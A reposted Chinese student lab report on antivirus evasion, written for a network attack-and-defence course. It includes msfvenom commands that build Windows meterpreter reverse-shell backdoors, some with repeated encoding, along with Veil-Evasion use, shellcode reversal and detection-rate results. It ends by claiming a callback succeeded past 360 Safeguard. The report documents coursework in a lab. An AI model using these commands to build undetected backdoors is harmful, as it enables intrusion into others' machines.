20145329 《网络对抗技术》免杀原理与实践

最新推荐文章于 2024-08-16 16:51:12 发布
最新推荐文章于 2024-08-16 16:51:12 发布
阅读量141 收藏 1
点赞数
文章标签: c/c++
原文链接:http://www.cnblogs.com/jdy1453/p/6624020.html
版权

实践内容:

(1)理解免杀技术原理(1分)

(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(2分)

(3)通过组合应用各种技术实现恶意代码免杀(1分)

(4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)

1.基础问题回答

杀软是如何检测出恶意代码的?

1.通过对文件代码的特征检测
2.通过对文件代码的观察,看它的基本信息,来源,文件属性等
3.通过对文件行为的监测,文件代码在工作时候的作为是否是有目标功能的

免杀是做什么?

构造一些能够躲过杀毒软件的检测,或者在检测之后不被杀掉。

免杀的基本方法有哪些?

1.改变特征码,对木马文件进行冲编码或者对它的原本的编码方式加以掩饰,即尽量不要使文件代码符合或接近恶意代码检测库里面对代码特征的统计,而使之被检测为恶意代码
2.改变行为,用被动的方式实现主动攻击的目标或者将恶意代码加入正常功能的代码中,伴随正常代码一起被执行
3.使用专门的辅助工具协助恶意代码成功植入靶机

2.实践总结与体会

本次实验是基于防护的原则进行的免杀病毒入侵的操作,发现计算机虽然几乎是个集结了世界上最聪明的一群人制造出来的产品,但是还是存在着很多很多的可以让黑客钻空子的漏洞,因为开发者创造产品的理念是基于实用、方便、安全等等诸多的目的开始的研发,要考虑方方面面,就难以把方方面面都考虑周全,而攻击者仅仅是基于破坏的原则做研究,所以成功的几率更大。之前觉得互联网中我们是与现实的关联是透明的,没有人看到,实际发现其实这层保护是很脆弱的。

3.离实战还缺些什么

目前我们所做的所有操作都是基于对靶机的一定了解,比如掌握IP信息,或者要求靶机配合接收传输的木马文件,而且木马一般都会被杀掉。要在实战中好的实现攻击,还需要对攻击方法的过程更加了解和更好的木马代码,以及对电脑系统漏洞的掌握。

4.实践过程记录

1.理解免杀技术原理

免杀技术是为了掩饰植入目标靶机的文件的恶意代码属性而使用的一系列技术和措施使得文件躲过靶机的杀毒软件的查杀,而成功植入靶机。

2.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;
msf编码器生成

  • 使用msf编码器生成一个后门程序
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded.exe

  • 文件传送到windows以后被查杀,找回后上传到virscan扫描,有21/39款杀软鉴定它为恶意代码

886473-20170326211212549-1266848503.png

886473-20170326211240127-1224852917.png

  • 使用msf编码器对恶意代码进行10次编码,并生成一个后门文件
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded10.exe

  • 文件传送到windows以后仍然被查杀

886473-20170326211647096-1344968448.png

  • 找回后上传到virscan扫描,有20/39款杀软鉴定它为恶意代码

886473-20170326212300346-280953597.png

886473-20170326212320705-1216907621.png

  • 对比查杀分析信息后发现其中一个名为Quickheal的杀软没有检测出多次编码后的恶意代码,说明这个杀软比较弱,不过也说明多次编码对个别杀软是有一定作用的,不过整体来讲对恶意代码成功植入靶机还是几率不大

886473-20170326212341111-1474545990.png

886473-20170326212400940-1297458193.png

  • 360安全卫士检测出以上msf编码器编码的两个恶意代码

886473-20170326212500440-955062337.jpg

veil-evasion
  • kali原本没有veil-evasion ,所以需要先安装
    sudo ape-get install veil-evasion
  • menu下依次输入语言、ip、端口号以及文件名等

886473-20170326212902471-1306974525.jpg

  • 将生成的可执行文件传送到windows,传送时windows杀软没有检测到文件为恶意代码并杀死它

  • 在windows文件中找到恶意代码(5329.exe),上传到virscan扫描发现有10/39款杀软识别出它是恶意代码(算是挺高的检测率了,然而我的360安全卫士却没有检测出它,看来这款杀软也不是很厉害,应该换一个)

886473-20170326213434799-513366431.png

shellcode编程
  • 在kali终端下生成一个c格式的十六进制数组,Ip为kali的

886473-20170326213706705-1812923473.jpg

  • 按照实验教程模版在windows VS 中编写一个c语言的shellcode代码,并将kali中生成的带有kali ip的十六进制数组加入c代码的编写中,

  • kali中运行msf监听

  • windows中VS调试shellcode代码,360杀软检测出木马,建议清除

886473-20170326214501236-870614089.png

  • 将c代码上传到virscan扫描,结果显示0/39的杀毒软件鉴定为恶意代码,可能是该网站的病毒库没有及时更新,或者我们生成的恶意代码已经不太具有恶意代码的特征或行为不太像恶意代码

886473-20170326215010283-1759112649.png

3.通过组合应用各种技术实现恶意代码免杀

参考高其同学的博客,使用shellcode逆序处理的方式对恶意代码再次进行加工编码,实现免杀

886473-20170326215634065-480313680.jpg

4.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

回连成功~
杀软名称:360安全卫士
主程序版本:11(11.0.0.2001)
备用木马库:2017-3-26

886473-20170326215729174-354638620.jpg

参考:

http://www.cnblogs.com/20145221GQ/p/6577002.html

转载于:https://www.cnblogs.com/jdy1453/p/6624020.html

dgflxcwno867930904
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
源码免杀-花指令
08-21
6. **学习资源**:了解和研究Delphi免杀及花指令技术,可以通过阅读相关书籍、参加网络安全论坛讨论、研究开源项目以及实践编写和分析恶意代码来提升技能。不过,重要的是要在合法的范围内进行,遵循信息安全的道德...
甲壳虫免杀培训技术教程
06-15
在【甲壳虫免杀培训教程.txt】这个文件中,读者可以期待找到关于这些主题的详细讲解和实践案例,帮助他们深入了解免杀技术并提升安全防御能力。不过,值得注意的是,这些知识的使用应遵守法律法规,不能用于非法活动...
2018-2019-2 网络对抗技术 20165314 Exp3 免杀原理实践
weixin_30693183的博客
03-29 121
免杀原理实践说明 一、实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 任务二:通过组合应用各种技术实现恶意代码免杀(1分) 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分) 二、基础问题回答 问:杀软是如何检测出恶意代码的? ...
2017-2018-2 20179216 《网络攻防与实践免杀技术
weixin_30892889的博客
05-27 101
基础内容 1. 杀软是如何检测出恶意代码的? 基于特征码的检测:杀软通过对已存在的流行代码特征的提取与比对检测到具有该特征码的程序就当作检测到了恶意代码。 基于行为的检测:杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等。 2. 免杀是做什么的? 通过一些手段来瞒过杀软的检测扫描,避免被杀毒软件查杀,并能成功控制被植入机。 3. 免杀的基本方法有哪些? 改变...
20169214 2016-2017-2 《网络攻防实践》实验——免杀技术
weixin_30617561的博客
06-04 148
20169214 2016-2017-2 《网络攻防实践》实验——免杀技术 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:杀软通过对已存在的流行代码特征的提取与比对检测到具有该特征码的程序就当作检测到了恶意代码。 基于行为的检测:杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等 (2)免杀是做什么? 就是通过针对杀毒软件查杀恶意代码...
20145236《网络攻防》 Exp3 免杀原理实践
weixin_30715523的博客
04-04 119
20145236《网络攻防》 Exp3 免杀原理实践 一、基础问题回答 1.杀软是如何检测出恶意代码的? 恶意代码有其特有的特征码,杀软将特征码加入检测库中,当检测到一段代码中具有这样的特征码时就可以判断为恶意代码。 为了防止自身特征码被检测,有些恶意代码使用了免杀加壳软件进行加壳,一些流行的加壳软件已经可以检查出来,如果被这样的加壳软件加壳就可能是恶意代码。 判断该代码是否有恶意行为,若有就...
盘点黑客攻击途径:最常用的7个策略及简单的防护方法
10-09 1755
时至今日,互联网上已有上千万的恶意软件横行,上万的骇客使用各种手段去欺骗容易受骗的网民。他们使用着数年或数十年内惯用的攻击手段,毫无新意的利用网名的懒惰、误判及一些“纯白痴”行为。 同时,每年反恶意软件研究员在恶意软件或者是恶意攻击中都会遇到一些引人侧目的技术,这些有灵感的技术在不断扩展恶意攻击的边界,也导致越来越多的聪明人上当受骗。近日PCWorld对当今世界最常用的7个攻击策略进行盘点,
20145203 盖泽双《网络对抗技术免杀原理实践
03-26 168
20145203 盖泽双《网络对抗技术》拓展之免杀原理实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? ①根据病毒的特征码 ②将可执行文件和收集的常见病毒库做对比。 ③观察可执行文件的行为。 (2)免杀是做什么? 采取一些手段使我们的病毒程序注入到靶机时,不被杀毒软件检查出来。可以正常运行以便于我们成功控制靶机。 (3)免杀的基本方法有哪些? 改变特征码 : ①加壳:压缩壳 ...
20145222《网络对抗免杀原理实践
weixin_33958366的博客
04-01 86
20145222黄亚奇《网络对抗免杀原理实践 知识点: 一、在一个已经感染了恶意代码的机器上如何找到病毒文件? 找到恶意代码才能对其分析,找到恶意代码文件就是就是分析的第一步,一般来讲,恶意代码运行必然会创建一个进程,而这个进程就是我们找到他的突破口,一个打开的进程,可以通过任务管理器、Process Explorer等来找到其映像文件的地址,这样就能找到恶意代码文件了 ...
20145322《网络对抗技术免杀原理实践
03-26 91
20145322《网络对抗技术免杀原理实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。 (2)免杀是做什么? 通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳,或用其他语言(如veil-evasion...
研究与免杀过360五引擎.rar
02-15
文件"研究与免杀过360五引擎.exe"可能是演示程序或实验环境,供学习者实践免杀技术,了解免杀原理并尝试应用这些技术。然而,值得注意的是,从事免杀技术的研究必须遵守道德准则,不得用于非法目的,因为这可能会...
网络免杀进攻学习网络免杀进攻学习网络免杀进攻学习网络免杀进攻学习
08-29
免杀技术的发展与反病毒软件的更新是相互博弈的过程,攻击者需要不断研究新的方法来规避检测。 花指令代码:花指令是一种特殊的编程技巧,通过插入无意义或难以理解的指令序列来混淆代码,使分析工具难以正确解析。...
快速掌握免杀的方法.实战、动手篇(20节课).rar
05-08
实战、动手篇(20节课)"是一门深度实践型的课程,它将帮助学员系统地学习和掌握各种免杀技术,提高他们在网络安全攻防中的实战水平。通过20节的实战训练,学员将能够熟练运用这些技术,提升恶意软件的隐蔽性和生存...
C/C++开发,opencv内置背景减除算法与运动检测
技术需要分享
08-14 1083
C/C++开发,opencv内置背景减除算法的完整代码及编译过程示例
C语言 | Leetcode C语言题解之第337题打家劫舍III
m0_59237910的博客
08-15 257
C语言 | Leetcode C语言题解之第337题打家劫舍III
C++ | Leetcode C++题解之第337题打家劫舍III
Ddddddd_158的博客
08-15 270
C++ | Leetcode C++题解之第337题打家劫舍III
C++】一文掌握C++中的IO流
最新发布
JLX_1的博客
08-16 663
本文详细讲解了C++中的IO流体系,讲解了各种接口的使用方法!
C语言 ——— 修改默认对齐数以及结构传参
weixin_55341642的博客
08-16 325
在上一篇中,有讲解到结构体内存对齐的规则以及默认对齐数C语言 ——— 结构体内存对齐-CSDN博客。
深度解析:生成对抗网络GANs原理实践(附代码)
本文主要介绍了生成对抗网络(GANs)的基本原理、实现步骤以及应用场景,并提供了深度学习领域的大神文章列表。文章详细阐述了生成模型和判别模型的概念,以及如何通过对抗训练来提升两者的能力。 生成对抗网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值